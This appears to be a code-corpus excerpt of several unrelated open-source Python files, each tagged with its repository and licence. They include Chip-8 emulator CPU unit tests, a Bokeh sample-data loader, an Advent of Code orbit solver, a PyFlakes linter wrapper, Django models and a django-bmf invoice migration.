self.cpu.logical_and()
self.assertEqual(
self.cpu.registers['v'][source],
source_val & target_val)
else:
for source_val in range(256):
self.cpu.registers['v'][source] = source_val
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.logical_and()
self.assertEqual(
self.cpu.registers['v'][source],
source_val)
def test_exclusive_or(self):
for source in range(0x10):
for target in range(0x10):
if source != target:
for source_val in range(0, 0xFF, 0x10):
for target_val in range(0xF):
self.cpu.registers['v'][source] = source_val
self.cpu.registers['v'][target] = target_val
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.exclusive_or()
self.assertEqual(
self.cpu.registers['v'][source],
source_val ^ target_val)
def test_add_to_reg(self):
for source in range(0xF):
for target in range(0xF):
if source != target:
for source_val in range(0, 0xFF, 0x10):
for target_val in range(0, 0xFF, 0x10):
self.cpu.registers['v'][source] = source_val
self.cpu.registers['v'][target] = target_val
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.add_reg_to_reg()
if source_val + target_val > 255:
self.assertEqual(
self.cpu.registers['v'][source],
source_val + target_val - 256)
self.assertEqual(
self.cpu.registers['v'][0xF], 1)
else:
self.assertEqual(
self.cpu.registers['v'][source],
source_val + target_val)
self.assertEqual(
self.cpu.registers['v'][0xF], 0)
def test_subtract_reg_from_reg(self):
for source in range(0xF):
for target in range(0xF):
if source != target:
for source_val in range(0, 0xFF, 0x10):
for target_val in range(0xF):
self.cpu.registers['v'][source] = source_val
self.cpu.registers['v'][target] = target_val
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.subtract_reg_from_reg()
if source_val > target_val:
self.assertEqual(
self.cpu.registers['v'][source],
source_val - target_val)
self.assertEqual(
self.cpu.registers['v'][0xF], 1)
else:
self.assertEqual(
self.cpu.registers['v'][source],
256 + source_val - target_val)
self.assertEqual(
self.cpu.registers['v'][0xF], 0)
def test_right_shift_reg(self):
for register in range(0xF):
for value in range(0, 0xFF, 0x10):
self.cpu.registers['v'][register] = value
self.cpu.operand = register << 8
self.cpu.operand = self.cpu.operand + (register << 4)
for index in range(1, 8):
shifted_val = value >> index
self.cpu.registers['v'][0xF] = 0
bit_zero = self.cpu.registers['v'][register] & 0x1
self.cpu.right_shift_reg()
self.assertEqual(
self.cpu.registers['v'][register], shifted_val)
self.assertEqual(self.cpu.registers['v'][0xF], bit_zero)
def test_subtract_reg_from_reg1(self):
for source in range(0xF):
for target in range(0xF):
if source != target:
for source_val in range(0, 0xFF, 0x10):
for target_val in range(0xF):
self.cpu.registers['v'][source] = source_val
self.cpu.registers['v'][target] = target_val
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.subtract_reg_from_reg1()
if target_val > source_val:
self.assertEqual(
self.cpu.registers['v'][source],
target_val - source_val)
self.assertEqual(
self.cpu.registers['v'][0xF], 1)
else:
self.assertEqual(
self.cpu.registers['v'][source],
256 + target_val - source_val)
self.assertEqual(
self.cpu.registers['v'][0xF], 0)
def test_left_shift_reg(self):
for register in range(0xF):
for value in range(256):
self.cpu.registers['v'][register] = value
self.cpu.operand = register << 8
self.cpu.operand = self.cpu.operand + (register << 4)
for index in range(1, 8):
shifted_val = value << index
bit_seven = (shifted_val & 0x100) >> 9
shifted_val = shifted_val & 0xFFFF
self.cpu.registers['v'][0xF] = 0
self.cpu.left_shift_reg()
self.assertEqual(
self.cpu.registers['v'][register],
shifted_val)
self.assertEqual(self.cpu.registers['v'][0xF], bit_seven)
def test_skip_if_reg_not_equal_reg(self):
for register in range(0x10):
self.cpu.registers['v'][register] = register
for source in range(0x10):
for target in range(0x10):
self.cpu.operand = source << 8
self.cpu.operand += (target << 4)
self.cpu.registers['pc'] = 0
self.cpu.skip_if_reg_not_equal_reg()
if source != target:
self.assertEqual(self.cpu.registers['pc'], 2)
else:
self.assertEqual(self.cpu.registers['pc'], 0)
def test_load_index_reg_with_value(self):
for value in range(0x10000):
self.cpu.operand = value
self.cpu.load_index_reg_with_value()
self.assertEqual(self.cpu.registers['index'], value & 0x0FFF)
def test_jump_to_index_plus_value(self):
for index in range(0, 0xFFF, 0x10):
for value in range(0, 0xFFF, 0x10):
self.cpu.registers['index'] = index
self.cpu.registers['pc'] = 0
self.cpu.operand = value
self.cpu.jump_to_index_plus_value()
self.assertEqual(index + value, self.cpu.registers['pc'])
def test_generate_random_number(self):
for register in range(0x10):
for value in range(0, 0xFF, 0x10):
self.cpu.registers['v'][register] = -1
self.cpu.operand = register << 8
self.cpu.operand += value
self.cpu.generate_random_number()
self.assertTrue(self.cpu.registers['v'][register] >= 0)
self.assertTrue(self.cpu.registers['v'][register] <= 255)
def test_move_delay_timer_into_reg(self):
for register in range(0x10):
for value in range(0, 0xFF, 0x10):
self.cpu.timers['delay'] = value
self.cpu.operand = register << 8
self.cpu.registers['v'][register] = 0
self.cpu.move_delay_timer_into_reg()
self.assertEqual(self.cpu.registers['v'][register], value)
def test_move_reg_into_delay_timer(self):
for register in range(0x10):
for value in range(0, 0xFF, 0x10):
self.cpu.registers['v'][register] = value
self.cpu.operand = register << 8
self.cpu.timers['delay'] = 0
self.cpu.move_reg_into_delay_timer()
self.assertEqual(self.cpu.timers['delay'], value)
def test_move_reg_into_sound_timer(self):
for register in range(0x10):
for value in range(0, 0xFF, 0x10):
self.cpu.registers['v'][register] = value
self.cpu.operand = register << 8
self.cpu.timers['sound'] = 0
self.cpu.move_reg_into_sound_timer()
self.assertEqual(self.cpu.timers['sound'], value)
def test_add_reg_into_index(self):
for register in range(0x10):
for index in range(0, 0xFFF, 0x10):
self.cpu.registers['index'] = index
self.cpu.registers['v'][register] = 0x89
self.cpu.operand = (register << 8)
self.cpu.add_reg_into_index()
self.assertEqual(index + 0x89, self.cpu.registers['index'])
def test_load_index_with_reg_sprite(self):
for number in range(0x10):
self.cpu.registers['index'] = 0xFFF
self.cpu.registers['v'][0] = number
self.cpu.operand = 0xF029
self.cpu.load_index_with_reg_sprite()
self.assertEqual(number * 5, self.cpu.registers['index'])
def test_store_bcd_in_memory(self):
for number in range(0x100):
number_as_string = '{:03d}'.format(number)
self.cpu.registers['index'] = 0
self.cpu.registers['v'][0] = number
self.cpu.operand = 0xF033
self.cpu.store_bcd_in_memory()
self.assertEqual(int(number_as_string[0]), self.cpu.memory[0])
self.assertEqual(int(number_as_string[1]), self.cpu.memory[1])
self.assertEqual(int(number_as_string[2]), self.cpu.memory[2])
def test_store_regs_in_memory(self):
for register in range(0x10):
self.cpu.registers['v'][register] = register
self.cpu.operand = (register << 8)
self.cpu.store_regs_in_memory()
self.cpu.registers['index'] = 0
for counter in range(register):
self.assertEqual(counter, self.cpu.memory[counter])
def test_read_regs_from_memory(self):
index = 0x500
self.cpu.registers['index'] = index
for register in range(0xF):
self.cpu.memory[index + register] = register + 0x89
for register in range(0xF):
for reg_to_set in range(0xF):
self.cpu.registers['v'][reg_to_set] = 0
self.cpu.operand = 0xF000
self.cpu.operand += (register << 8)
self.cpu.operand += 0x65
self.cpu.read_regs_from_memory()
for reg_to_check in range(0xF):
if reg_to_check > register:
self.assertEqual(self.cpu.registers['v'][reg_to_check], 0)
else:
self.assertEqual(
self.cpu.registers['v'][reg_to_check],
reg_to_check + 0x89)
def test_store_regs_in_rpl(self):
for register in range(0x10):
self.cpu.registers['v'][register] = register
self.cpu.operand = (register << 8)
self.cpu.store_regs_in_rpl()
for counter in range(register):
self.assertEqual(counter, self.cpu.registers['rpl'][counter])
def test_read_regs_from_rpl(self):
for register in range(0xF):
self.cpu.registers['rpl'][register] = register + 0x89
for register in range(0xF):
for reg_to_set in range(0xF):
self.cpu.registers['v'][reg_to_set] = 0
self.cpu.operand = 0xF000
self.cpu.operand += (register << 8)
self.cpu.operand += 0x85
self.cpu.read_regs_from_rpl()
for reg_to_check in range(0xF):
if reg_to_check > register:
self.assertEqual(self.cpu.registers['v'][reg_to_check], 0)
else:
self.assertEqual(
self.cpu.registers['v'][reg_to_check],
reg_to_check + 0x89)
def test_load_rom(self):
self.cpu.load_rom('test/romfile', 0)
self.assertEqual(ord('a'), self.cpu.memory[0])
self.assertEqual(ord('b'), self.cpu.memory[1])
self.assertEqual(ord('c'), self.cpu.memory[2])
self.assertEqual(ord('d'), self.cpu.memory[3])
self.assertEqual(ord('e'), self.cpu.memory[4])
self.assertEqual(ord('f'), self.cpu.memory[5])
self.assertEqual(ord('g'), self.cpu.memory[6])
def test_decrement_timers_decrements_by_one(self):
self.cpu.timers['delay'] = 2
self.cpu.timers['sound'] = 2
self.cpu.decrement_timers()
self.assertEqual(1, self.cpu.timers['delay'])
self.assertEqual(1, self.cpu.timers['sound'])
def test_decrement_timers_does_not_go_negative(self):
self.cpu.timers['delay'] = 0
self.cpu.timers['sound'] = 0
self.cpu.decrement_timers()
self.assertEqual(0, self.cpu.timers['delay'])
self.assertEqual(0, self.cpu.timers['sound'])
def test_clear_screen(self):
self.cpu.operand = 0xE0
self.cpu.clear_return()
self.screen.clear_screen.assert_called_with()
def test_clear_return_from_subroutine(self):
self.cpu.operand = 0xEE
address = 0x500
self.cpu.memory[self.cpu.registers['sp']] = address & 0x00FF
self.cpu.memory[self.cpu.registers['sp'] + 1] = \
(address & 0xFF00) >> 8
self.cpu.registers['sp'] += 2
self.cpu.registers['pc'] = 0
self.cpu.clear_return()
self.assertEqual(self.cpu.registers['pc'], address)
def test_operation_9E_pc_skips_if_key_pressed(self):
self.cpu.operand = 0x09E
self.cpu.registers['v'][0] = 1
self.cpu.registers['pc'] = 0
result_table = [False] * 512
result_table[pygame.K_4] = True
with mock.patch("pygame.key.get_pressed", return_value=result_table) as key_mock:
self.cpu.keyboard_routines()
self.assertTrue(key_mock.asssert_called)
self.assertEqual(2, self.cpu.registers['pc'])
def test_operation_9E_pc_does_not_skip_if_key_not_pressed(self):
self.cpu.operand = 0x09E
self.cpu.registers['v'][0] = 1
self.cpu.registers['pc'] = 0
result_table = [False] * 512
with mock.patch("pygame.key.get_pressed", return_value=result_table) as key_mock:
self.cpu.keyboard_routines()
self.assertTrue(key_mock.asssert_called)
self.assertEqual(0, self.cpu.registers['pc'])
def test_operation_A1_pc_skips_if_key_not_pressed(self):
self.cpu.operand = 0x0A1
self.cpu.registers['v'][0] = 1
self.cpu.registers['pc'] = 0
result_table = [False] * 512
with mock.patch("pygame.key.get_pressed", return_value=result_table) as key_mock:
self.cpu.keyboard_routines()
self.assertTrue(key_mock.asssert_called)
self.assertEqual(2, self.cpu.registers['pc'])
def test_operation_A1_pc_does_not_skip_if_key_pressed(self):
self.cpu.operand = 0x0A1
self.cpu.registers['v'][0] = 1
self.cpu.registers['pc'] = 0
result_table = [False] * 512
result_table[pygame.K_4] = True
with mock.patch("pygame.key.get_pressed", return_value=result_table) as key_mock:
self.cpu.keyboard_routines()
self.assertTrue(key_mock.asssert_called)
self.assertEqual(0, self.cpu.registers['pc'])
def test_draw_zero_bytes_vf_not_set(self):
self.cpu.operand = 0x00
self.cpu.registers['v'][0xF] = 1
self.cpu.draw_sprite()
self.assertTrue(self.screen.update_screen.assert_called)
self.assertEqual(0, self.cpu.registers['v'][0xF])
def test_execute_instruction_raises_exception_on_unknown_op_code(self):
with self.assertRaises(UnknownOpCodeException) as context:
self.cpu.execute_instruction(operand=0x8008)
self.assertEqual("Unknown op-code: 8008", str(context.exception))
def test_execute_instruction_raises_exception_on_unknown_op_code_from_cpu(self):
with self.assertRaises(UnknownOpCodeException) as context:
self.cpu.operand = 0x8008
self.cpu.execute_instruction(operand=0x8008)
self.assertEqual("Unknown op-code: 8008", str(context.exception))
def test_execute_instruction_on_operand_in_memory(self):
self.cpu.registers['pc'] = 0x200
self.cpu.memory[0x200] = 0x61
result = self.cpu.execute_instruction()
self.assertEqual(0x6100, result)
self.assertEqual(0x202, self.cpu.registers['pc'])
def test_execute_logical_instruction_raises_exception_on_unknown_op_codes(self):
for x in range(8, 14):
self.cpu.operand = x
with self.assertRaises(UnknownOpCodeException):
self.cpu.execute_logical_instruction()
# And finally test 15 (F)
self.cpu.operand = 15
with self.assertRaises(UnknownOpCodeException):
self.cpu.execute_logical_instruction()
def test_misc_routines_raises_exception_on_unknown_op_codes(self):
self.cpu.operand = 0x0
with self.assertRaises(UnknownOpCodeException) as context:
self.cpu.misc_routines()
self.assertEqual("Unknown op-code: 0", str(context.exception))
def test_scroll_down_called(self):
self.cpu.operand = 0x00C4
self.cpu.clear_return()
self.screen.scroll_down.assert_called_with(4)
def test_scroll_right_called(self):
self.cpu.operand = 0x00FB
self.cpu.clear_return()
self.assertTrue(self.screen.scroll_right.assert_called)
def test_scroll_left_called(self):
self.cpu.operand = 0x00FC
self.cpu.clear_return()
self.assertTrue(self.screen.scroll_left.assert_called)
def test_set_extended(self):
self.cpu.operand = 0x00FF
self.cpu.clear_return()
self.assertTrue(self.screen.set_extended.assert_called)
self.assertEqual("extended", self.cpu.mode)
def test_disable_extended(self):
self.cpu.operand = 0x00FE
self.cpu.clear_return()
self.assertTrue(self.screen.set_normal.assert_called)
self.assertEqual("normal", self.cpu.mode)
def test_exit(self):
self.cpu.running = True
self.cpu.operand = 0x00FD
self.cpu.clear_return()
self.assertFalse(self.cpu.running)
def test_draw_extended_called(self):
self.cpu.mode = MODE_EXTENDED
self.cpu.draw_sprite()
self.assertTrue(self.cpu_spy.draw_extended.assert_called)
def test_draw_sprite_draws_correct_sprite(self):
screen = Chip8Screen(2)
screen.init_display()
screen_mock = mock.Mock(wraps=screen, spec=screen)
self.cpu = Chip8CPU(screen_mock)
self.cpu.memory[0] = 0xAA
self.cpu.draw_normal(0, 0, 1)
with patch('chip8.screen.Chip8Screen.draw_pixel'):
screen_mock.draw_pixel.assert_has_calls([
call(0, 0, 1),
call(1, 0, 0),
call(2, 0, 1),
call(3, 0, 0),
call(4, 0, 1),
call(5, 0, 0),
call(6, 0, 1),
call(7, 0, 0)
])
def test_draw_sprite_turns_off_pixels(self):
screen = Chip8Screen(2)
screen.init_display()
screen_mock = mock.Mock(wraps=screen, spec=screen)
self.cpu = Chip8CPU(screen_mock)
self.cpu.memory[0] = 0xAA
self.cpu.draw_normal(0, 0, 1)
self.cpu.draw_normal(0, 0, 1)
with patch('chip8.screen.Chip8Screen.draw_pixel'):
screen_mock.draw_pixel.assert_has_calls([
call(0, 0, 1),
call(1, 0, 0),
call(2, 0, 1),
call(3, 0, 0),
call(4, 0, 1),
call(5, 0, 0),
call(6, 0, 1),
call(7, 0, 0),
call(0, 0, 0),
call(1, 0, 0),
call(2, 0, 0),
call(3, 0, 0),
call(4, 0, 0),
call(5, 0, 0),
call(6, 0, 0),
call(7, 0, 0)
])
def test_draw_sprite_does_not_turn_off_pixels(self):
screen = Chip8Screen(2)
screen.init_display()
screen_mock = mock.Mock(wraps=screen, spec=screen)
self.cpu = Chip8CPU(screen_mock)
self.cpu.memory[0] = 0xAA
self.cpu.draw_normal(0, 0, 1)
self.cpu.memory[0] = 0x55
self.cpu.draw_normal(0, 0, 1)
with patch('chip8.screen.Chip8Screen.draw_pixel'):
screen_mock.draw_pixel.assert_has_calls([
call(0, 0, 1),
call(1, 0, 0),
call(2, 0, 1),
call(3, 0, 0),
call(4, 0, 1),
call(5, 0, 0),
call(6, 0, 1),
call(7, 0, 0),
call(0, 0, 1),
call(1, 0, 1),
call(2, 0, 1),
call(3, 0, 1),
call(4, 0, 1),
call(5, 0, 1),
call(6, 0, 1),
call(7, 0, 1)
])
def test_load_index_with_sprite(self):
self.cpu.registers['v'][1] = 10
self.cpu.operand = 0xF130
self.cpu.load_index_with_extended_reg_sprite()
self.assertEqual(100, self.cpu.registers['index'])
def test_str_function(self):
self.cpu.registers['v'][0] = 0
self.cpu.registers['v'][1] = 1
self.cpu.registers['v'][2] = 2
self.cpu.registers['v'][3] = 3
self.cpu.registers['v'][4] = 4
self.cpu.registers['v'][5] = 5
self.cpu.registers['v'][6] = 6
self.cpu.registers['v'][7] = 7
self.cpu.registers['v'][8] = 8
self.cpu.registers['v'][9] = 9
self.cpu.registers['v'][10] = 10
self.cpu.registers['v'][11] = 11
self.cpu.registers['v'][12] = 12
self.cpu.registers['v'][13] = 13
self.cpu.registers['v'][14] = 14
self.cpu.registers['v'][15] = 15
self.cpu.registers['pc'] = 0xBEEF
self.cpu.operand = 0xBA
self.cpu.registers['index'] = 0xDEAD
result = str(self.cpu)
self.assertEqual(
"PC: BEED OP: BA\nV0: 0\nV1: 1\nV2: 2\nV3: 3\nV4: 4\nV5: 5\nV6: 6"
"\nV7: 7\nV8: 8\nV9: 9\nVA: A\nVB: B\nVC: C\nVD: D\nVE: E\nVF: F\nI: DEAD\n", result)
def test_wait_for_keypress(self):
EventMock = collections.namedtuple('EventMock', 'type')
event_mock = EventMock(type=pygame.KEYDOWN)
self.cpu.operand = 0x0
with mock.patch("pygame.event.wait", return_value=event_mock):
result_table = [False] * 512
result_table[pygame.K_4] = True
with mock.patch("pygame.key.get_pressed", return_value=result_table):
self.cpu.wait_for_keypress()
self.assertEqual(0x1, self.cpu.registers['v'][0])
# M A I N #####################################################################
if __name__ == '__main__':
unittest.main()
# E N D O F F I L E #######################################################
| craigthomas/Chip8Python | test/test_chip8cpu.py | Python | mit | 32,960 |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2020, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
'''
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import logging # isort:skip
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Bokeh imports
from ..util.sampledata import package_csv
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
__all__ = (
'data',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
def _read_data():
'''
'''
from ..util.dependencies import import_required
module = 'commits'
pd = import_required('pandas', '%s sample data requires Pandas (http://pandas.pydata.org) to be installed' % module)
data = package_csv(module, 'commits.txt.gz', parse_dates=True, header=None, names=['day', 'datetime'], index_col='datetime')
data.index = pd.to_datetime(data.index, utc=True,).astype('datetime64[ns]').tz_localize('utc').tz_convert('US/Central')
data['time'] = data.index.time
return data
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
data = _read_data()
| ericmjl/bokeh | bokeh/sampledata/commits.py | Python | bsd-3-clause | 2,253 |
import os
import sys
def main():
"""
This file will checkout the empty file from the previous submission and have them relabeled.
"""
input_file = sys.argv[1]
assert 'input' in input_file
old_dir = input_file.replace('-redo', '').replace('/input', '')
while old_dir[-1] == '/':
old_dir = old_dir[:-1]
old_empty_file = old_dir + '/' + os.path.basename(old_dir) + '.empty'
with open(old_empty_file) as fh:
assignmentIDs = [line.split()[0] for line in fh.readlines()[1:]]
old_results_file = old_empty_file.replace('.empty', '.results')
with open(old_results_file) as fh:
results = fh.readlines()
inputs = ['urls\n']
for aid in assignmentIDs:
result = [result for result in results if aid in result]
assert len(result) == 1
result = result[0]
input_line = [r.replace('"', '')+'\n' for r in result.split() if '.jpeg' in r][0]
inputs.append(input_line)
with open(input_file, 'w') as fh:
fh.writelines(inputs)
if __name__ == '__main__':
main()
| andriluka/mechturk-public | utils/redo_input_from_empty.py | Python | bsd-3-clause | 1,074 |
def First_Part(orbits):
Orbits = dict()
checksum = 0
for orbit in orbits:
od, og = orbit.split(')')
Orbits[og] = od
for og in Orbits.keys():
while 1:
try:
og = Orbits[og]
checksum += 1
except KeyError:
break
return checksum
def Second_Part(orbits):
Orbits = dict()
for orbit in orbits:
od, og = orbit.split(')')
Orbits[og] = od
oPast = ["YOU"]
oCurr = [Orbits["YOU"]]
oNext = list()
dist = 0
while "SAN" not in oCurr:
for o in oCurr:
oNext += ([Orbits[o]] if o != "COM" else []) + [i for i in Orbits.keys() if Orbits[i] == o and i not in oPast]
oCurr = oNext
oNext = list()
oPast += oCurr
dist += 1
return dist - 1
Orbits = '''COM)B
B)C
C)D
D)E
E)F
B)G
G)H
D)I
E)J
J)K
K)L
K)YOU
I)SAN'''.split('\n')
Orbits = open("Inputs/Day_06.txt", 'r').read().split('\n')[:-1]
print(First_Part(Orbits))
print(Second_Part(Orbits))
| ImpregnableProgrammer/Advent-of-Code | 2019/Day_06.py | Python | gpl-3.0 | 1,071 |
import numpy as np
from scipy import stats
import spm1d
#(0) Load dataset:
dataset = spm1d.data.uv0d.regress.RSRegression()
dataset = spm1d.data.uv0d.regress.ColumbiaHeadCircumference()
y,x = dataset.get_data()
print( dataset )
#(1) Conduct test using spm1d:
spmt = spm1d.stats.regress(y, x)
spmti = spmt.inference(0.05, two_tailed=True)
print( spmti )
#(2) Compare to scipy.stats result:
slope,intercept,r,p,se = stats.linregress(x, y)
t = r * ((y.size-2)/(1-r*r) )**0.5
print( 'scipy.stats result:\n r = %.5f\n t = %.5f\n p = %.5f' %(r,t,p) )
| 0todd0000/spm1d | spm1d/examples/scipy/ex_regression.py | Python | gpl-3.0 | 577 |
# -*- coding: utf8 -*-
# Copyright (C) 2013 - Oscar Campos <oscar.campos@member.fsf.org>
# This program is Free Software see LICENSE file for details
import re
import _ast
from linting import linter
import pyflakes.checker as pyflakes
pyflakes.messages.Message.__str__ = (
lambda self: self.message % self.message_args
)
class PyFlakesError(pyflakes.messages.Message):
"""Lint error base class
"""
def __init__(self, filename, loc, level, message, message_args, **kwargs):
super(PyFlakesError, self).__init__(filename, loc)
self.level = level
self.message = message
self.message_args = message_args
class PyFlakesLinter(linter.Linter):
"""Linter for PyFlakes Linter
"""
def lint(self, settings, code, filename):
"""Run the pyflakes code checker with the given options
"""
errors = []
pyflakes_ignore = settings.get('pyflakes_ignore', None)
pyflakes_disabled = settings.get('pyflakes_disabled', False)
explicit_ignore = settings.get('pyflakes_explicit_ignore', [])
if not pyflakes_disabled and not settings.get('use_pylint'):
errors.extend(self.check(code, filename, pyflakes_ignore))
return self.parse(errors, explicit_ignore)
def check(self, code, filename, ignore=None):
"""Check the code with pyflakes to find errors
"""
class FakeLoc:
lineno = 0
try:
code = code.encode('utf8') + b'\n'
tree = compile(code, filename or '', 'exec', _ast.PyCF_ONLY_AST)
except (SyntaxError, IndentationError):
return self._handle_syntactic_error(code, filename)
except ValueError as error:
return [PyFlakesError(filename, FakeLoc(), error.args[0])]
else:
# the file is syntactically valid, check it now
w = pyflakes.Checker(tree, filename, ignore)
return w.messages
def parse(self, errors, explicit_ignore):
"""Parse the errors returned from the PyFlakes library
"""
error_list = []
if errors is None:
return error_list
errors.sort(key=linter.cmp_to_key(lambda a, b: a.lineno < b.lineno))
for error in errors:
error_level = 'W' if not hasattr(error, 'level') else error.level
message = error.message.capitalize()
error_data = {
'underline_range': False,
'level': error_level,
'lineno': error.lineno,
'message': message,
'raw_error': str(error)
}
if hasattr(error, 'offset'):
error_data['offset'] = error.offset
elif hasattr(error, 'col'):
error_data['offset'] = error.col
if (isinstance(error, (linter.OffsetError))):
error_data['underline_range'] = True
error_list.append(error_data)
elif (isinstance(
error, (
pyflakes.messages.RedefinedWhileUnused,
pyflakes.messages.UndefinedName,
pyflakes.messages.UndefinedExport,
pyflakes.messages.UndefinedLocal,
pyflakes.messages.UnusedVariable)) and
error.__class__.__name__ not in explicit_ignore):
error_data['len'] = len(error.message_args[0])
error_data['regex'] = (
r'((and|or|not|if|elif|while|in)\s+|[+\-*^%%<>=\(\{{])*\s'
'*(?P<underline>[\w\.]*{0}[\w]*)'.format(re.escape(
error.message_args[0]
))
)
error_list.append(error_data)
elif isinstance(error, pyflakes.messages.ImportShadowedByLoopVar):
regex = 'for\s+(?P<underline>[\w]*{0}[\w*])'.format(
re.escape(error.message_args[0])
)
error_data['regex'] = regex
error_list.append(error_data)
elif (isinstance(
error, (
pyflakes.messages.UnusedImport,
pyflakes.messages.ImportStarUsed)) and
error.__class__.__name__ not in explicit_ignore):
if isinstance(error, pyflakes.messages.ImportStarUsed):
word = '*'
else:
word = error.message_args[0]
linematch = '(from\s+[\w_\.]+\s+)?import\s+(?P<match>[^#;]+)'
r = '(^|\s+|,\s*|as\s+)(?P<underline>[\w]*{0}[\w]*)'.format(
re.escape(word)
)
error_data['regex'] = r
error_data['linematch'] = linematch
error_list.append(error_data)
elif (isinstance(error, pyflakes.messages.DuplicateArgument) and
error.__class__.__name__ not in explicit_ignore):
regex = 'def [\w_]+\(.*?(?P<underline>[\w]*{0}[\w]*)'.format(
re.escape(error.message_args[0])
)
error_data['regex'] = regex
error_list.append(error_data)
elif isinstance(error, pyflakes.messages.LateFutureImport):
pass
elif isinstance(error, linter.PythonError):
print(error)
else:
print(
'Ooops, we missed an error type for pyflakes', type(error)
)
return error_list
| alexfalcucc/anaconda | anaconda_lib/linting/anaconda_pyflakes.py | Python | gpl-3.0 | 5,568 |
from django.db import models
class Utilisateur(models.Model):
pseudo = models.CharField(max_length=12)
mdp = models.CharField(max_length=12)
mail = models.CharField(max_length=20)
class Amis(models.Model):
utilisateur = models.ForeignKey(Utilisateur,on_delete=models.CASCADE)
amisde = models.ForeignKey(Utilisateur,on_delete=models.CASCADE)
class Question(models.Model):
intitule = models.CharField(max_length=200)
utilisateur = models.ForeignKey(Utilisateur,on_delete=models.CASCADE)
class Reponse(models.Model):
intitule = models.CharField(max_length=200)
utilisateur = models.ForeignKey(Utilisateur,on_delete=models.CASCADE)
question = models.ForeignKey(Question,on_delete=models.CASCADE) | batebates/L3ProjetWeb | BDR/models.py | Python | mit | 709 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
from django.conf import settings
import djangobmf.fields
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
migrations.swappable_dependency(settings.BMF_CONTRIB_TRANSACTION),
migrations.swappable_dependency(settings.BMF_CONTRIB_ADDRESS),
migrations.swappable_dependency(settings.BMF_CONTRIB_PRODUCT),
]
operations = [
migrations.CreateModel(
name='Invoice',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('modified', models.DateTimeField(auto_now=True, verbose_name='Modified', null=True)),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created', null=True)),
('uuid', models.CharField(editable=False, max_length=100, blank=True, null=True, verbose_name='UUID', db_index=True)),
('state', djangobmf.fields.OLDWorkflowField(db_index=True, max_length=32, null=True, editable=False, blank=True)),
('invoice_number', models.CharField(max_length=255, null=True, verbose_name='Invoice number')),
('net', models.FloatField(null=True, editable=False, blank=True)),
('date', models.DateField(null=True, verbose_name='Date')),
('due', models.DateField(null=True, verbose_name='Due', blank=True)),
('notes', models.TextField(null=True, verbose_name='Notes', blank=True)),
('term_of_payment', models.TextField(null=True, verbose_name='Term of payment', blank=True)),
('created_by', models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True, related_name="+")),
('invoice_address', models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, to=settings.BMF_CONTRIB_ADDRESS, null=True, related_name="quotation_invoice")),
('modified_by', models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True, related_name="+")),
('shipping_address', models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, to=settings.BMF_CONTRIB_ADDRESS, null=True, related_name="shipping_invoice")),
('transaction', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, blank=True, editable=False, to=settings.BMF_CONTRIB_TRANSACTION, null=True, related_name="transation_invoice")),
],
options={
'ordering': ['invoice_number'],
'abstract': False,
'verbose_name': 'Invoice',
'verbose_name_plural': 'Invoices',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='InvoiceProduct',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255, null=True, verbose_name='Name')),
('price', djangobmf.fields.MoneyField(verbose_name='Price', max_digits=27, decimal_places=9)),
('price_currency', djangobmf.fields.CurrencyField(default=djangobmf.fields.get_default_currency, max_length=4, null=True, editable=False)),
('price_precision', models.PositiveSmallIntegerField(default=0, null=True, editable=False, blank=True)),
('amount', models.FloatField(default=1.0, null=True, verbose_name='Amount')),
('description', models.TextField(null=True, verbose_name='Description', blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='invoice',
name='products',
field=models.ManyToManyField(to=settings.BMF_CONTRIB_PRODUCT, through='djangobmf_invoice.InvoiceProduct'),
preserve_default=True,
),
migrations.AddField(
model_name='invoiceproduct',
name='invoice',
field=models.ForeignKey(related_name='invoice_products', null=True, blank=True, to='djangobmf_invoice.Invoice'),
preserve_default=True,
),
migrations.AddField(
model_name='invoiceproduct',
name='product',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='invoice_products', null=True, blank=True, to='djangobmf_product.Product'),
preserve_default=True,
),
]
| django-bmf/django-bmf | djangobmf/contrib/invoice/migrations/0001_initial.py | Python | bsd-3-clause | 4,828 |
# Copyright 2020 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Transformer model components."""
from typing import Optional
import haiku as hk
import jax
import jax.numpy as jnp
import numpy as np
